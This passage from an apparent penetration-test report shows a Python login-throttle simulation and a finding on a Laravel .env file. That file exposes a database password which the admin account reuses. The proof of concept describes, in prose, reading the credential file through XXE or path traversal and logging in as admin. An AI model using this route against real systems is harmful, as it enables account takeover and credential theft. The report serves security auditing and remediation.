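        return self.clock() >= self.locked_until[key]

    def record(self, key: str, success: bool) -> None:
        if success:
            self.failures[key] = 0
            return
        self.failures[key] += 1
        if self.failures[key] >= self.max_failures:
            self.locked_until[key] = self.clock() + self.lock_seconds
            self.failures[key] = 0


def spaced_attempts(key: str, count: int = 40, spacing: float = 15.0) -> List[Tuple[float, str, bool]]:
    """Constructed attempt stream: `count` failed logins `spacing` seconds apart."""
    return [(i * spacing, key, False) for i in range(count)]


def run(throttle_factory: Callable, attempts: List[Tuple[float, str, bool]]) -> int:
    """Replay (time, key, success) triples; return how many attempts got through."""
    now = [0.0]
    throttle = throttle_factory(lambda: now[0])
    allowed = 0
    for t, key, success in attempts:
        now[0] = t
        if throttle.permitted(key):
            allowed += 1
            throttle.record(key, success)
    return allowed
```

The key should combine the target account with the source address; a lockout keyed on the account alone lets anyone lock a user out on purpose, which is why the recommendation pairs throttling with CAPTCHA or MFA rather than relying on lockout by itself.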

Finding 11: Admin Password Leakage in Configuration Files

  • Category: Configuration Management
  • Severity: High
  • Location: Filesystem - Configuration Files
  • Description:
    • Observation:

      • The application's configuration file at /var/www/laravel/.env contains sensitive information, including the database password, in plaintext. This is the configuration file of the Laravel server.
      • Unfortunately the admin account with the email admin@localhost uses the exact same password.
    • Proof of Concept

      1. We just need to read the /var/www/laravel/.env file through any file-read vulnerability (XXE, path traversal, etc.). There we can see DB_PASSWORD, which is also used for the admin account. Alternatively, the admin account can be obtained through session fixation.

      2. We can login as admin with email admin@localhost, which is disclosed in chat.

    • Impact:

      • The presence of plaintext passwords in configuration files poses a significant security risk, allowing attackers to obtain sensitive credentials and potentially gain unauthorized access to critical systems or accounts. In this case to Admin account.
    • Recommendation:

      • Encrypt or hash sensitive credentials stored in configuration files to prevent plaintext exposure.
      • Restrict access permissions to configuration files to authorized personnel only.
      • Implement secure storage practices and consider using a secrets management solution to store and manage sensitive information securely.

CVSS Score: 9.8 (Critical) CWE-312: Cleartext Storage of Sensitive Information in a Resource